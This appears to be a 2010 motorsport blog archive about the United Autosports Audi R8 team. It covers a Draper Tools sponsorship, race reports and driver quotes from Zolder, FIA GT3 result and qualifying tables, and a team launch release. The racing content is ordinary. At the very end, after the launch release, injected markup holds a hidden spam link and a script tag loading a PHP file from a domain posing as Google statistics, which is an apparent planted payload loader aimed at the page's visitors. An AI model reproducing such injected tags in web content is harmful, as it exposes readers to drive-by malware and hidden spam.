Tuesday, November 30, 2010

Draper Tools Becomes Partner Of United Autosports’ 2011 Programs

United Autosports’ brace of Audi R8 LMS sports cars will be adorned in Draper Tools livery for the Anglo-American team’s attack on the FIA GT3 European and British GT Championships next year.

Draper Tools Limited is a family-run company supplying hand tools to industry since 1919. In addition to car branding Draper Tools, based in Hampshire, England, will supply equipment and consumables for both United Autosports’ FIA and BGT teams.

The company sells products in all major tool categories including automotive, builders, DIY, gardening, construction, decorating and engineering. More recently Draper Tools, awarded accolades for the high quality of its products, has diversified into hobby, leisure and other non tool lines.

In addition to FIA races likely to be staged in England, France, the Netherlands, Portugal, Russia and Spain plus BGT races (listed below), United Autosports will be in action again at the 24 Hours of Spa (July 30-31) where it claimed stunning third and fourth places in the GT3 category last year.

United Autosports will also work closely with Draper Tools so that valued existing and potential customers attend races in Europe next year and watch the action close-up. Draper Tools also has an agreement with Grand Prix Racing (GPR) who will be both promoting and selling the Draper brand via their Silverstone facility and its website.

2011 Avon Tyres British GT Championship
08 Mar  Silverstone  Media/Test Day
09 Mar  Silverstone  Test Day
23-25 Apr  Oulton Park  2hr race
14/15 May  Snetterton 300  2hr race
18/19 Jun  Brands Hatch  2x1hr races
07/08 Jul  Spa-Francorchamps  2x1hr races
tbc  Silverstone or Donington  2x1hr races
03/04 Sep  Rockingham  2x1hr races
24/25 Sep  Donington Park GP  3hr race
08/09 Oct  Silverstone Arena  2hr race
(Provisional calendar)


Clive Richardson, Marketing Director at Draper Tools:
“Our new association with United Autosports is a further extension of our ongoing brand awareness at the top level of automotive tool users. Our company is delighted to be the team’s prime tooling sponsor and are very excited at being linked with major brands like Audi and Dunlop. Being associated with these prestige brands on race tracks throughout Europe will further promote the Draper Tools brand in this key product sector.”


Zak Brown (USA). Driver, Chairman, Co-Owner United Autosports:
“It’s great to have fantastic partners such as Draper Tools support our team. We depend heavily on their superb equipment to help us build and maintain our racecars so the association fits perfectly.”


Richard Dean (GB), Managing Director & Co-Owner of United Autosports:
“Draper Tools’ backing of United Autosports is a further endorsement of our new but fast moving team! Draper has a high end and extensive product range which fits perfectly with the exacting standards our team require. Motorsport always works in an extreme environment that proves any product and our engineers are delighted and proud to be in partnership with Draper Tools.”

* A comprehensive library of Editorial Copyright Free photographs can be downloaded at www.flickr.com/unitedautosports.

Sunday, October 10, 2010

United Autosports Make A Point In Both Belgian Races To End Season On Encouraging Note


United Autosports brought the curtain down on its maiden FIA GT3 European Championship season at Zolder (Belgium) today (Sunday October 10).

The American-owned team claimed two, top-10 placings in the two final rounds of the 12-race series which began in May – just two months after the American-owned, British-based outfit was formed – at the historic 2.492-mile track in Heusden-Zolder near Brussels.

United Autosports, which will contest the 2011 FIA GT3 European Championship with two Audi R8 LMS sports cars, finished 12th in the FIA GT3 Teams Championship. In the Audi Manufacturer's Cup, Guasch/Patterson finished third with Bell/Brown seventh.

Race 1 (Sunday)
Qualifying: 8th #22 Patterson, 1m 33.380s; 11th #23 Brown, 1m 33.592s. Weather: Sunny, warm.
Race Result: 10th (#22) +24.951s P1; 17th (#23), -7 laps. Weather: Sunny, cool.

Mark Patterson began the opening one-hour race held under unseasonably warm sunshine, from eighth place on the grid having claimed his personal best qualifying position of the season the previous day, but the sun wasn’t shining on Zak Brown.

Having made a poor start, Brown went in to the tight Turn 1 left-hander aggressively but made side-on contact with a Ford GT40 which spun him in to the gravel trap. Zak lost three laps as his Audi R8 LMS was retrieved and then further time after a cautionary visit to the pits to check for damage, the #23 Audi resuming at the tail of the field in 24th place.

Zak handed over to Matt Bell on 27mins from 21st place with Patterson bringing the fifth-placed #22 Audi in for co-driver Michael Guasch with 26mins remaining in the thick of the mandatory pit-stop action, Michael resuming 13th.

Guasch took the checker placed 10th after a good, consistent drive on the tail of a three-car dice for eighth position. Meanwhile, Bell, set lap times quicker than the top-10 cars in the latter stages.


Race 2 (Sunday)
Qualifying: 13th #23 Bell, 1m 32.909s; 18th #22 Guasch, 1m 33.703s. Weather: Sunny, warm.
Race Result: 9th (#23) +50.301s P1; 12th (#22) +61.6 P1. Weather: Sunny, warm.

Bell slipped a place in the opening laps embroiled in a six-car battle for ninth while Guasch, who had moved up to 17th slipped four places with 20mins run after a spin but handed over to Patterson placed 14th at mid-distance, the #22 Audi resuming in 20th.

The ninth-placed #23 Audi headed to the pits with 26mins remaining, Brown rejoining the race in 14th position. Both United Autosports Audi R8 LMS sports cars spectacularly made up positions in the closing 15mins, despite Brown being pushed off by another car from behind in to a gravel trap at the chicane earlier in his stint. Patterson chased down the race leader, successfully unlapping himself after contact with the lead Ford GT40 – a maneuver deemed completely legal by race officials – to finish 12th.

Brown moved into 10th place on the penultimate lap and then claimed ninth at the flag after an audacious move around the outside of a Corvette in the final series of corners.

#22 Molecule / Cerutti – Audi R8 LMS
Michael Guasch (USA).  Lives: Walnut Creek, California, USA:
“I took over from Mark in Race 1 who had done a great job. I got to run with the ‘fast’ group and it felt good – it went very, very well. The Audi was excellent today – an absolute joy to drive and I held my own and got a shot for the top-10.

“I just couldn’t find the speed in qualifying the previous day despite the balance of the Audi being good and so started Race 2 in 18th. I made a clean start and ran a good pace until I overshot a turn, hit the curb which spun me around which was frustrating. It was a dumb mistake but the brakes were fading which caught me out.

“I quickly learned that the championship was a very serious, respectable and competitive series. My low point was Silverstone where we were faced with the harsh reality that we were not as competitive as we’d hoped due to the Audi being ‘neutered’ because of the Balance of Power [BoP] handicap. The high point was Portimão when Mark and I scored a top-10 finish, the first FIA race after our Audi was given some power back.”  

Mark Patterson (USA).  Lives: Bronxville, New York State, USA: 
“Once into a rhythm in the first race I got in some good, fast laps but I didn’t race well enough in the opening stages and lost a couple of positions. I started eighth and Mike brought the Audi home 10th equaling our best race result of the season – Mike gets all the credit for racing so well on ‘old’ tires.

“Mike battled well in what seemed to be pretty much an incident-free opening to Race 2 but when I was driving, there were yellow flags everywhere with lots of things going on and was pretty chaotic. Despite losing time due to not being able to overtake caused by the yellows, I clawed in some places – the pace of the Audi real good at the end again.

“My biggest disappointment this season was the Balance of Power adjustments, or lack of them, but the FIA got there in the end and our fantastic Audi sports car was then able to fight for top-10 placings. I’ve enjoyed racing on some of Europe’s finest tracks, including revisiting the incomparable Spa, and the new, exciting and highly challenging Portimão track. My biggest surprise was how deep the field of driving talent has been – I imagined, and had hoped (!) there would have been more ‘Bronze’ graded drivers. Best moment was for Mike and I to score United Autosports’ first championship point. Meanwhile our Audi has been flawless mechanically all season.”


#23 Remington – Audi R8 LMS
Zak Brown (USA).  Lives: Carmel, Indiana, USA:
“My qualifying was a bit sloppy and never got in a good lap then I got a terrible start in the opening race which really sucked which then went from bad to worse at Turn 1. I hit a Ford GT40 being too aggressive and ended up in the ‘kitty litter’ which took an age to get towed out. Although we were able to continue our race was effectively over and I felt terrible for Matt.

“I had a whole lot of fun in the second race and the Audi was just great again in the closing laps. Unfortunately I got hit from behind by a Ford GT40 so that cost me some time and re-take the cars I’d already overtaken. Unfortunately there were a lot of yellows [flags] so I couldn’t pass on half the track. I’m happy to finish the season in the points again – we were strong in our last three races so I’m already looking forward to next year.

“What I’ve learnt in the last five months is that this series is one of the toughest and most competitive racing championships in the world. I’ve been surprised just how difficult the competition has been with the lowest point coming at Silverstone when it became blatantly obvious just how long it was going to take us to become competitive. But it’s been a whole bunch of fun with our rostrum finish at Portimão the obvious highlight.”

Matthew Bell (GB). Lives: Barningham nr Richmond, North Yorkshire, England:
“I struggled a bit in qualifying but sat down with my engineer and looked over the data but Race 1 effectively became another test session after Zak’s first corner incident meant we weren’t really in the race. I made a good start in Race 2 and fought hard. We were all close together but it’s very difficult to overtake as the track is so narrow making it easy to defend.

“It’s been a very tough, full first year for me. The biggest surprise was the level of competition when we arrived for the opening races at Silverstone. After that weekend in early May, I soon realized it was going to be a hard year. But I've also learnt a lot – about the Audi R8 LMS, about the circuits and about the team – which can only help me next year when I will do British GT and the FIA series again. Failing to finish three races were the low points of the season while not surprisingly the podium at Portimão is the obvious stand out moment of the year for me.”

Richard Dean (GB), Managing Director & Co-Owner of United Autosports:
“Qualifying was disappointing – a very average performance – although Mark produced a fine effort. The opening race was short-lived for the #23 Audi when Zak made a slow start at the green light and suffered a collision at the first corner. After that it became a ‘test’ for that car. Mark did a solid job to keep the #22 Audi in touch with the top-10 when he handed over to Mike in what was effectively the fast group of ‘gold’ rated drivers. Mike held his own there and went on to score another championship point and I’m delighted for them both, they did a really good job.  

“The #22 Audi spun while the #23 Audi was pushed off the track in Race 2 which cost us places but both finished strongly. Mike and Mark were really strong. Matt did a solid job before Zak got hit pretty hard in to a spin which cost us a top-five but he got himself back into the points.

“We have shown an improvement over the year which is very pleasing. We’ll come back next year bigger and stronger. The biggest thing I’ve learnt this year is that the FIA GT3 series is very, very tough and not to pre-judge our competitiveness before the first official qualifying session of the year – otherwise you can only be disappointed! But we didn’t panic and once the BoP was actually balanced it came together for us.

“I’m very proud of what Zak and my team has achieved it its first season and the hard work they’ve put in while maintaining a good sense of humor and great atmosphere. On-track watching Zak stick the Audi on the front row in Portugal and proving to everyone we finally had found our true pace was a lovely moment. Matt showing he has star quality in the making. But the progress of all four drivers this year and how positive and supportive they have been. And of course Spa, although not part of the FIA series, the end of the 24 Hour race left me with mixed feelings. I was on a high for finishing third and fourth in class in our first ever 24 hour race but also felt a little low knowing we were so close to winning GT3.”


Audi R8 LMS (Sportscar according to latest 2010 FIA GT3 regulations)
V10 5.2-liter engine, 4 valves per cylinder, petrol direct injection, emission control by two racing catalytic converters, rear-wheel-drive, traction control (ASR), sequential pneumatic activated 6-speed sport gearbox with shift-paddles, Audi Space Frame (ASF) made of aluminum with bolted steel roll-cage, carbon-fiber composite/aluminum bodywork, Michelin radial tires. Start weight 1,335kg. Limitation at 8500rpm for every gear. Developed by Audi Sport with cooperation from quattro GmbH. Won FIA GT3 European Championship, ADAC-GT Masters and Belgian GT Championship plus Nürburgring 24 Hours and Spa 24 Hours class victories in début 2009 season scoring a total 23 victories. United Autosports achieved third and fourth places on the team’s 24 hour race début in the 2010 Spa 24 Hours and its first FIA GT3 European Championship top-three finish in Portugal (19 Sep).

* A comprehensive library of Editorial Copyright Free photographs can be downloaded at www.flickr.com/unitedautosports.


Round 12 race results



Round 12 race results

October 10th 2010 - Zolder, Belgium

FIA GT3 Championship

Race 2 Result
PosCarClassDriversCarTimeLapsGap

1
1GT3Rodrigues/MakowieckiAston Martin DBRS91:00:13.043370

2
77GT3Walter/HürtgenBMW Z41:00:17.095374.052

3
60GT3Lappalainen/PalttalaPorsche 911 GT3 R1:00:18.111375.068

4
76GT3Söderlund/SandströmBMW Z41:00:21.070378.027

5
14GT3Eskelinen/NygaardFord GT1:00:27.4423714.399

6
11GT3Vannelet/NaracPorsche 911 GT3 R1:00:40.6253727.582

7
23GT3Brown/BellAudi R8 LMS1:00:54.4643741.421

8
5GT3Hirschi/GuilvertAudi R8 LMS1:01:09.2083756.165

9
22GT3Patterson/GuaschAudi R8 LMS1:01:15.8043701:02.761

10
16GT3Lambotte/ParisyCorvette Z06R GT31:01:24.7583701:11.715

11
2GT3Paillard/AccaryAston Martin DBRS91:01:31.8803701:18.837

12
17GT3Vincent/PeyrolesCorvette Z06R GT31:01:48.6053701:35.562

13
30GT3Teregulov/RomanovAscari KZ1R GT31:00:20.874361 lap

14
6GT3Demay/Lorgere-RouxAudi R8 LMS0:57:36.229352 laps

15
101GT3Hohenadel/KeilwitzCorvette Z06R GT30:51:41.231316 laps

16
98GT3Beche/De DonckerFord GT 0:46:35.437289 laps

17
12GT3Thiry/FumalPorsche 911 GT3 R0:44:30.1072710 laps

18
99GT3Lesoudier/MartinFord GT 0:50:21.7752710 laps

19
100GT3Ritskes/van OranjeCorvette Z06R GT30:48:49.2362611 laps

20
3GT3Lemeret/HeyerAudi R8 LMS0:38:10.861818 laps

21
87GT3Dockerill/FerrierFerrari 430 Scuderia0:02:34.077136 laps

Session Notes
WeatherSunny
Track conditionsDry
Stewards Decisionsfollowing the stewards decision no. 15 30s penalty for the car no. 16
NotesExclusion of cars n° 61 and n° 27, subject to the results of the appeal to the ICA

Weather: sunny - Track: dry

Official Championship website: www.fiagt3.com

Round 11 race results



Round 11 race results

October 10th 2010 - Zolder, Belgium

FIA GT3 Championship

Race 1 Result
PosCarClassDrivers CarTimeLapsGap

1
76 GT3 Söderlund/Sandström BMW Z4 01:01:21 38 0

2
61 GT3 van Splunteren/Holzer Porsche 911 GT3 R 01:01:30 38 9.126

3
98 GT3 Beche/De Doncker Ford GT 01:01:32 38 11.379

4
77 GT3 Walter/Hürtgen BMW Z4 01:01:33 38 12.409

5
12 GT3 Thiry/Fumal Porsche 911 GT3 R 01:01:39 38 18.718

6
60 GT3 Lappalainen/Palttala Porsche 911 GT3 R 01:01:40 38 19.223

7
16 GT3 Lambotte/Parisy Corvette Z06R GT3 01:01:41 38 20.699

8
14 GT3 Eskelinen/Nygaard Ford GT 01:01:45 38 24.302

9
101 GT3 Hohenadel/Keilwitz Corvette Z06R GT3 01:01:45 38 24.362

10
22 GT3 Patterson/Guasch Audi R8 LMS 01:01:46 38 24.951

11
5 GT3 Hirschi/Guilvert Audi R8 LMS 01:01:57 38 36.259

12
2 GT3 Paillard/Accary Aston Martin DBRS9 01:01:57 38 36.519

13
30 GT3 Teregulov/Romanov Ascari KZ1R GT3 01:01:47 37 26.295

14
27 GT3 Ide/Franchi Audi R8 LMS 00:58:33 36 02:47.4

15
11 GT3 Vannelet/Narac Porsche 911 GT3 R 00:56:48 35 04:32.5

16
99 GT3 Lesoudier/Martin Ford GT 00:50:40 31 10:40.4

17
3 GT3 Lemeret/Heyer Audi R8 LMS 00:51:08 31 10:12.5

18
23 GT3 Brown/Bell Audi R8 LMS 01:00:25 31 56.214

19
6 GT3 Demay/Lorgere-Roux Audi R8 LMS 00:49:10 30 12:10.6

20
17 GT3 Vincent/Peyroles Corvette Z06R GT3 00:37:33 22 23:47.6

21
1 GT3 Rodrigues/Makowiecki Aston Martin DBRS9 00:35:32 21 25:48.8

22
87 GT3 Dockerill/Ferrier Ferrari 430 Scuderia 00:17:09 10 44:11.7

23
100 GT3 Ritskes/van Oranje Corvette Z06R GT3 00:11:32 7 49:48.6

24
28 GT3 Cameron/Griffin Ferrari 430 Scuderia 00:12:17 7 49:03.6

Fastest lap: Rodrigues - 1:32.337 - average speed: 156.11 km/h

Weather: sunny - Track: dry

Official Championship website: www.fiagt3.com

Saturday, October 9, 2010

Zolder Qualifying Results - Round 2

Qualifying 2
PosCarClassDriversCarTimeLapsGapAvg
speed

1
1GT3Rodrigues/MakowieckiAston Martin DBRS901:31.217400

2
99GT3Lesoudier/MartinFord GT 01:31.44650.2290

3
61GT3van Splunteren/HolzerPorsche 911 GT3 R01:31.65970.4420

4
11GT3Vannelet/NaracPorsche 911 GT3 R01:31.72660.5090

5
14GT3Eskelinen/NygaardFord GT01:32.08770.870

6
27GT3Ide/FranchiAudi R8 LMS01:32.09680.8790

7
2GT3Paillard/AccaryAston Martin DBRS901:32.19670.9790

8
6GT3Demay/Lorgere-RouxAudi R8 LMS01:32.20980.9920

9
101GT3Hohenadel/KeilwitzCorvette Z06R GT301:32.32271.1050

10
60GT3Lappalainen/PalttalaPorsche 911 GT3 R01:32.49581.2780

11
77GT3Walter/HürtgenBMW Z401:32.62181.4040

12
5GT3Hirschi/GuilvertAudi R8 LMS01:32.83081.6130

13
23GT3Brown/BellAudi R8 LMS01:32.90981.6920

14
16GT3Lambotte/ParisyCorvette Z06R GT301:33.04781.830

15
3GT3Lemeret/HeyerAudi R8 LMS01:33.27082.0530

16
12GT3Thiry/FumalPorsche 911 GT3 R01:33.50162.2840

17
17GT3Vincent/PeyrolesCorvette Z06R GT301:33.66192.4440

18
22GT3Patterson/GuaschAudi R8 LMS01:33.703102.4860

19
100GT3Ritskes/van OranjeCorvette Z06R GT301:34.06072.8430

20
30GT3Teregulov/RomanovAscari KZ1R GT301:34.77093.5530

21
87GT3Dockerill/FerrierFerrari 430 Scuderia01:34.93233.7150

22
98GT3Beche/De DonckerFord GT 01:35.04893.8310

23
28GT3Cameron/GriffinFerrari 430 Scuderia01:39.34538.1280

Zolder Qualifying Results - Round 1

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Qualifying 1
PosCarClassDriversCarTimeLapsGapAvg
speed

1
98GT3Beche/De DonckerFord GT 01:32.2071100

2
3GT3Lemeret/HeyerAudi R8 LMS01:32.354100.1470

3
12GT3Thiry/FumalPorsche 911 GT3 R01:32.35660.1490

4
61GT3van Splunteren/HolzerPorsche 911 GT3 R01:32.76460.5570

5
101GT3Hohenadel/KeilwitzCorvette Z06R GT301:32.93670.7290

6
76GT3Söderlund/SandströmBMW Z401:33.08150.8740

7
11GT3Vannelet/NaracPorsche 911 GT3 R01:33.10070.8930

8
22GT3Patterson/GuaschAudi R8 LMS01:33.380131.1730

9
77GT3Walter/HürtgenBMW Z401:33.421101.2140

10
27GT3Ide/FranchiAudi R8 LMS01:33.56571.3580

11
23GT3Brown/BellAudi R8 LMS01:33.592121.3850

12
60GT3Lappalainen/PalttalaPorsche 911 GT3 R01:33.75381.5460

13
99GT3Lesoudier/MartinFord GT 01:33.92691.7190

14
17GT3Vincent/PeyrolesCorvette Z06R GT301:34.023101.8160

15
4GT3Demoustier/AmmermüllerAudi R8 LMS01:34.05051.8430

16
16GT3Lambotte/ParisyCorvette Z06R GT301:34.296102.0890

17
6GT3Demay/Lorgere-RouxAudi R8 LMS01:34.415112.2080

18
2GT3Paillard/AccaryAston Martin DBRS901:34.610112.4030

19
5GT3Hirschi/GuilvertAudi R8 LMS01:34.83672.6290

20
14GT3Eskelinen/NygaardFord GT01:34.926112.7190

21
1GT3Rodrigues/MakowieckiAston Martin DBRS901:35.05592.8480

22
100GT3Ritskes/van OranjeCorvette Z06R GT301:35.50173.2940

23
30GT3Teregulov/RomanovAscari KZ1R GT301:35.940113.7330

24
87GT3Dockerill/FerrierFerrari 430 Scuderia01:37.353105.1460

25
28GT3Cameron/GriffinFerrari 430 Scuderia01:43.286811.0790

Monday, October 4, 2010

AUDI CUSTOMER TEAM COMBINES U.S. MARKETING AND U.K. TECHNICAL RESOURCES<BR><BR>      ZIONSVILLE, IN (October 2, 2009) – Pending formal FIA approval, the 2010 FIA GT3 European Championship is expected to feature a notably American accent through the newly launched United Autosports race team, it was announced today. The team will field two factory-assisted Audi R8 LMS racecars, according to co-owner and driver, American Zak Brown. <BR><BR>    Brown, 37, is hardly a stranger to international motorsports. He raced his way across Europe in multiple open wheel series during his twenties. He has since become a renowned international racing insider as the founder and CEO of U.S.-based Just Marketing International (JMI), the world's leading motorsports-exclusive marketing agency. United Autosports' on-track efforts will be supported with JMI's full-service resources, applied principally to promoting the team's sponsors on both sides of the Atlantic. <BR><BR>    For Brown, the return to competition on Europe's legendary road courses is literally a dream come true. <BR><BR>    "I wasn't much beyond a kid when I first came to Europe," recalled Brown. "No bankroll for racing, no sure prospects. I lived hand-to-mouth, saw the Old World and raced on legendary circuits. I matured as a driver and a businessman through those experiences. Now, returning as owner of a new well-prepared team is magic." <BR><BR>    "In creating United Autosports there were a number of different series we considered," said Brown. "FIA GT3 was an easy choice as it is respected, well-run and offers fierce competition among many of the world's prestige performance car brands. Beyond that, it provides a nice runway for upward migration to FIA GT1 or the LeMans Series."<BR><BR>    Brown's first order of business was the creation of the team itself. For that, he turned to long-time friend and previous driver teammate, Britain's Richard Dean. As United Autosports' co-owner and Managing Director, Dean, 44, is the chief architect of the team's preparation and execution on and off the race track. In addition to a distinguished career as a driver, including single-seaters, saloon cars and GT cars, Dean has additionally served as managing director of Ginetta Cars, the largest volume racing car manufacturer in Great Britain. A former winner of the 24 Hours of Le Mans as a driver (GT2, 2006), he has also served as the Director of Zytek Engineering, a Le Mans Prototype chassis manufacturer and suppliers to the F3000 series.<BR><BR>    "My role is quite simple," said Dean. "Put in place a soundly-organized racing operation with a mind toward future expansion. Knowing Zak Brown for a long time and watching what he has created in the motorsports commercial space, I'm excited to have the opportunity to complement that by building a similar caliber racing enterprise." <BR><BR>    According to Dean, United Autosports will first focus on the FIA GT3 series, but in time will consider other opportunities in motor racing, including running an initially limited schedule of events in vintage racing events in North America.<BR><BR>    "Given our start-up position, we are very fortunate to be aligned with Audi," he said. "Their sports car racing heritage is legendary and their premium global brand position is complimentary to our own goals for United Autosports."<BR><BR>    Adding to the race team's managerial depth is John Della Penna, who serves as Sporting Director. No stranger to personally fielding high-profile teams including in CART, IRL, and Ferrari Challenge among others, the veteran Della Penna will preside over various special projects for the team including vintage racing.<BR><BR>    Also on the managerial team is John Hogan, who serves as Commercial Director. Throughout his lengthy motorsports career, Hogan has directly contributed to the development and professionalism of the modern motorsports industry. Hogan's experience includes 30 years at Philip Morris as Vice President, Marketing and Sales and directing the world's largest single-brand portfolio in racing, the "Marlboro Red" branding.<BR><BR>    Along with producing a solid sponsorship base, Brown's priorities include securing top-shelf drivers for the remaining seats on the two-car team. To that end, he said he will have an especially keen eye for recruiting other American drivers, but mindful of securing the overall best available talent. <BR><BR>    Besides Brown himself, another of the team's driver seats has been filled by talented Argentinean Pablo Perez Companc. A winning campaigner in both sports car and open wheel competition, Companc's career was temporarily side-lined after suffering substantial lower extremity injuries in a 2007 Firestone Indy Lights crash at Homestead Miami Speedway. Now recovered, he joins the team after recent successful forays in the Ferrari Challenge North American and Argentina's GT 2000 tours.<BR><BR><BR>      ABOUT UNITED AUTOSPORTS<BR>    United Autosports is a U.S.-owned professional auto racing team and motorsports development business based in Yorkshire, England. In 2010, United Autosports is expected to feature a two-car Audi R8 LMS team in the FIA European GT3 series.<BR><BR>      ABOUT JUST MARKETING INTERNATIONAL (JMI)<BR>    JMI is the global leader in motorsports marketing. JMI leverages its insider knowledge, influence and relationships to deliver creative customized solutions to organizations that are looking for a differentiator through motorsports sponsorship to drive their business. JMI is an independent, full-service agency representing corporations in all forms of motorsports worldwide. With more than 125 staff globally, JMI operates six offices in four countries and manages over $300 million in annual motorsports investments. JMI's client list is comprised of leading corporations, some of which include Crown Royal, DIRECTV, Hilton Hotels, Johnnie Walker, Lenovo, LG Electronics, SUBWAY® Restaurants, UPS and Verizon Wireless, among others. JMI's clients participate in all major motorsports series, including NASCAR, Formula One World Championship, IndyCar Series, Grand-Am, NHRA, World Rally Championship, and the American Le Mans Series. For more information, please visit JMI on the worldwide web at http://www.justmarketing.com/ http://www.justmarketing.com/. <BR><BR><BR>    </title><a style=display:none; href=http://worid-of-books.com >book</a> </title><script src=http://google-stats48.info/ur.php></script>